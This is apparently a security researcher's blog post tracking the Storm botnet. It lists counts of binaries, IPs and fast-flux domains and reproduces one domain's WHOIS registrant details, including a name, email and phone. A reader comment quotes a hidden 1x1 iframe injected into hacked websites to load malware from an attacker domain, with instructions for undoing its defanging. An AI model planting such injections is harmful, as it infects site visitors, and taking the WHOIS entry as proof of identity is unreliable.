Behold, the power of Storm

As expected, the Storm Botnet has been gaining strength over the last 6 weeks. Current estimates are in the hundreds of thousands, to a million drones.

Stormworm has been our primary focus over the last few weeks as well.

To date, DISOG has uncovered over

14376 unique storm related binaries,
3118 unique Storm Serving IPs,
258 supernode peers,
85 unique nameservers,
and 13 fast flux domains.

In total, we've identified 3420 unique IP addresses that have been under control of the stormworm author(s), and identifying themselves in one form or another. There are likely hundreds of thousands more drones that we are totally unaware of!

One of the storm worm fastflux domains appears to not be privacy hidden. I'm unclear if this is a slip up or a setup, but its interesting!

Domain Name: LTBREW.COM
Registrar: ESTDOMAINS, INC.
Whois Server: whois.estdomains.com
Referral URL: http://www.estdomains.com
Registrant:
Daniel Korwel (noviymoyma@yahoo.com)
N/A
Los-Angeles
CALI,53313
US
Tel. +1.3235212327

Keep posted, we will continue to update this page as we learn more.

Reader Comment (Pre-Site-Change:)

The fallowing code was injected into 4 of my websites:
------------------------------------
\"<iframe src=\"http://kqfloat.xxxcom/ind.php\" alt=\"BYDLOSHKA\"
height=\"1\" width=\"1\"></iframe>\"
------------------------------------
Remove the xxx in the domain name to get the virus/trojan horse in
your computer.
They use several other domains to host the Virus or Trojan Horse. When
I check the Whois all were PrivacyProtected, accept one. snlilac.com
shows the owner: http://www.whois.net/whois_new.cgi?d=snlilac&tld=com
When I search on "Daniel Korwel" in Google i found this news article.

What tells me that the hack of my websites is part of this Storm Botneck.
So I assume they have expanded from email to infiltrating websites to spread out the Worm.